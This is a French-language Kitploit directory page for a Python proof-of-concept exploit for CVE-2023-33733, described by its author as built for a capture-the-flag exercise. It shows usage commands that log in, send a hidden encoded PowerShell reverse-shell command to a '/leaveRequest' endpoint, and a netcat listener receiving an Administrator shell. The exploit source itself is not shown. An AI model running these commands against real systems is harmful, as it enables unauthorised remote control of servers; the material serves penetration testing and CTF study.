Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2023-33733-Exploit-PoC — Script d'exploitation Python pour CVE-2023-33733 ciblant les applications web. Automatise l'authentification, l'extraction de session et la livraison de reverse shell pour les tests de pénétration et les environnements CTF. | Kitploit
Outils/GitHubGitHub/l41kaa/cve-2023-33733-exploit-poc
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebCTFTests d'Intrusion
GitHubl41kaa/cve-2023-33733-exploit-poc

CVE-2023-33733-Exploit-PoC

Script d'exploitation Python pour CVE-2023-33733 ciblant les applications web. Automatise l'authentification, l'extraction de session et la livraison de reverse shell pour les tests de pénétration et les environnements CTF.

Voir le dépôt
313il y a 2 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2023-33733-POC

Avertissement

Je n'ai pas découvert cette vulnérabilité et je ne revendique pas le mérite de l'avoir trouvée. Ceci est simplement un script que j'ai construit pour exploiter plus facilement cette vulnérabilité dans le cadre d'un CTF. Pour les informations originales, veuillez vous référer à : https://github.com/c53elyas/CVE-2023-33733

Ce script est simplement destiné à être un script Python3 rapide pour exploiter CVE-2023-33733. Vous devrez fournir l'hôte, le port, la commande et un cookie de session valide.

Menu d'aide

root@kitploit:~
kali@kali:~/Desktop$ python3 exp.py --help 
usage: foothold.py [-h] --host HOST --port PORT --cmd CMD --session SESSION

options:
  -h, --help            show this help message and exit
  --host HOST
  --port PORT, -p PORT
  --cmd CMD, -c CMD
  --username USERNAME, -u USERNAME
  --password PASSWORD, -ps PASSWORD
  --session SESSION, --cookie SESSION, -sc SESSION
                        Session cookie

Utilisation

root@kitploit:~
kali@kali:~/Desktop$ python3 exp.py --host "vuln.server" --port 80 --cmd "powershell -nop -w hidden -e <your revshell code here>" --username "<your username here>" --password "<your password here>"
[*] Logging in to http://vuln.server:80
Retreived session cookie: SESSION=...
[*] Extracting session token...
[*] Token extracted:  .abc.xyz
[*] Building Exploit...
[*] Exploit built
[*] Preparing request
[*] Sending request to http://vuln.server:80/leaveRequest
[*] Sending a reverse shell should cause request to hang
[*] Request sent
[*] Probable success. Status Code 504


kali@kali:~/Desktop$ python3 exp.py --host "vuln.server" --port 80 --cmd "powershell -nop -w hidden -e <your revshell code here>" --session "<your cookie here>"
[*] Building Exploit...
[*] Exploit built
[*] Preparing request
[*] Sending request to http://vuln.server:80/leaveRequest
[*] Sending a reverse shell should cause request to hang
[*] Request sent
[*] Probable success. Status Code 500


# Écouteur

kali@kali:~/Desktop$ nc -lnvp 9001 connect to [10.10.10.2] from (UNKNOWN) [10.10.10.1] 50246 whoami Administrator

root@kitploit:~
Télécharger l’outil